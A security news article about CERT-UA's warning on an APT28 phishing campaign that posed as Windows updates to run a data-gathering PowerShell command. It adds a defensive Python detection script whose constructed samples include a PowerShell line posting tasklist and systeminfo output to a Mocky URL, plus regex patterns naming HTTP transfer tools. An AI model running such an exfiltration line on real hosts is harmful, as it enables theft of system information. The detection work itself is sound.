Ukraine’s Computer Emergency Response Team (CERT-UA) has issued a warning regarding cyber attacks targeting multiple government entities in the country, carried out by Russian state-sponsored hackers.
The phishing campaign has been linked to APT28, a group that operates under various aliases such as Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy.
As part of their operation, the attackers utilized genuine employee names, which they obtained through undisclosed methods, to create @outlook.com email addresses during the initial phases of the attack.
The emails carry the subject line “Windows Update” and, in Ukrainian, instruct the recipient to run a PowerShell command under the guise of installing security updates. No legitimate update steps are provided; the command itself is the payload.
Running that command downloads and executes a second-stage PowerShell script, which gathers basic host information using built-in commands such as “tasklist” and “systeminfo”.
The collected output is then exfiltrated via an HTTP request to a Mocky API endpoint.
According to BleepingComputer, who first reported the campaign, Mocky is a legitimate service that lets developers create mock HTTP endpoints with custom responses.
In this case, APT28 abused the service as a drop point for the exfiltrated data.
To prevent similar attacks, CERT-UA advises system administrators to restrict the ability to execute PowerShell on critical hosts and to monitor network traffic for connections to the Mocky service API.
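The two signals CERT-UA points at, recon commands feeding an HTTP upload, and outbound traffic to Mocky, can be checked against the telemetry most Windows environments already have. The script below is an added example written for this article, not code from CERT-UA or BleepingComputer: it runs one rule over PowerShell script-block text (the content of Event ID 4104 in Microsoft-Windows-PowerShell/Operational, which requires Script Block Logging to be enabled) and a second over proxy log lines. The Mocky host names (mocky.io, run.mocky.io) are an assumption about the service's domains, the proxy log format is invented, and every sample event is constructed; none of it is taken from the actual campaign.

```python
"""Detection logic for the APT28 "Windows Update" lure described above.

Rule 1: a PowerShell script block that runs host reconnaissance
        (tasklist / systeminfo) and sends data out over HTTP.
Rule 2: a proxy log line showing a connection to the Mocky service.

All sample events below are constructed for this example; they are not
real captures from the campaign.
"""
import re
from dataclasses import dataclass

# Assumed Mocky domains (not stated in the article); adjust to what
# your proxy actually sees.
MOCKY_DOMAINS = ("mocky.io", "run.mocky.io")

RECON_CMDS = re.compile(r"\b(tasklist|systeminfo)\b", re.IGNORECASE)
HTTP_SEND = re.compile(
    r"(Invoke-WebRequest|Invoke-RestMethod|iwr\b|irm\b|curl\b|wget\b|"
    r"Net\.WebClient|HttpClient|DownloadString|UploadString)",
    re.IGNORECASE,
)
HOST_IN_URL = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


@dataclass
class Finding:
    source: str   # "scriptblock" or "proxy"
    rule: str     # which rule fired
    detail: str   # human-readable context


def _is_mocky_host(host):
    """Exact or subdomain match against the assumed Mocky domains."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in MOCKY_DOMAINS)


def check_script_block(script_text):
    """Apply rule 1 (and the Mocky URL check) to one script-block payload."""
    findings = []
    recon = RECON_CMDS.findall(script_text)
    sends = HTTP_SEND.search(script_text) is not None
    if recon and sends:
        cmds = sorted(set(c.lower() for c in recon))
        findings.append(Finding("scriptblock", "recon_then_http",
                                f"runs {cmds} and sends over HTTP"))
    for host in HOST_IN_URL.findall(script_text):
        if _is_mocky_host(host):
            findings.append(Finding("scriptblock", "mocky_url", host))
    return findings


def check_proxy_line(line):
    """Apply rule 2 to a constructed proxy line:
    '<timestamp> <client_ip> <method> <url> <status>'."""
    parts = line.split()
    if len(parts) < 5:
        return []
    _ts, client, method, url, _status = parts[:5]
    m = HOST_IN_URL.match(url)
    if not m:
        return []
    host = m.group(1)
    if _is_mocky_host(host):
        return [Finding("proxy", "mocky_connection", f"{client} {method} {host}")]
    return []


def scan(script_blocks, proxy_lines):
    """Run both rules over the supplied telemetry and return all findings."""
    findings = []
    for block in script_blocks:
        findings.extend(check_script_block(block))
    for line in proxy_lines:
        findings.extend(check_proxy_line(line))
    return findings


# Constructed sample telemetry (not real captures).
SAMPLE_SCRIPT_BLOCKS = [
    # Benign admin script: runs systeminfo but only writes to a local file.
    "systeminfo | Out-File C:\\temp\\inventory.txt",
    # Mirrors the reported behaviour: recon output posted to a Mocky URL.
    "$d = (tasklist; systeminfo) | Out-String; "
    "Invoke-RestMethod -Uri 'https://run.mocky.io/v3/EXAMPLE-ID' -Method Post -Body $d",
]
SAMPLE_PROXY_LINES = [
    "2023-05-02T10:14:03Z 10.0.5.17 GET https://update.microsoft.com/ 200",
    "2023-05-02T10:14:09Z 10.0.5.17 POST https://run.mocky.io/v3/EXAMPLE-ID 200",
    "2023-05-02T10:15:11Z 10.0.5.22 GET https://notmocky.io/ 200",   # must not match
]

if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS, SAMPLE_PROXY_LINES):
        print(f"[{f.source}] {f.rule}: {f.detail}")
```

Rule 1 deliberately requires both a recon command and an HTTP send in the same script block, so routine inventory scripts that only write to disk do not fire; the domain check uses exact or subdomain matching so a look-alike such as notmocky.io is not flagged. If your proxy already denies uncategorised or mock-API services, the proxy rule becomes a confirmation of that block rather than a detection.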
To deceive the targets into running the PowerShell command, the phishing emails impersonated system administrators of the targeted government entities, utilizing fake Microsoft Outlook email accounts that were created using the employees’ genuine names and initials.
This is consistent with our earlier coverage of a recent report from Google’s Threat Analysis Group, which found that approximately 60% of the phishing emails it observed in the first quarter of 2023 were directed at Ukraine.
The report attributes those phishing emails to Russian threat actors and singles out APT28 as a major perpetrator of this activity.